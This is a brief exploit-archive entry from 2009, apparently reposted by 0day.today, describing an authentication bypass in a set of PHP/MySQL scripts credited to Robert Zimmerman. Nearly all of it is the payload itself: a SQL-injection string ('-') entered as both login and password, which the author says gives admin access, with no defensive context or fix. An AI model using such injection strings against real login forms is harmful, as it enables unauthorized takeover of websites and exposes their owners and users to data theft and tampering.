id: 10061
date: 12/01/2009
title: PHP / MYSQL Scripts Admin Bypass
author: DUNDEE
cves: 

=================================================
Robert Zimmerman PHP / MYSQL Scripts Admin Bypass
=================================================

---------------------------------------------------
- Robert Zimmerman PHP / MYSQL SCRIPTS ADMIN BYPASS -
 ---------------------------------------------------
 
EXPLOIT :
 
 Login :  '-'
 Pass  :  '-'
 
And u Got admin acces ;)


#  0day.today [2023-03-25]  #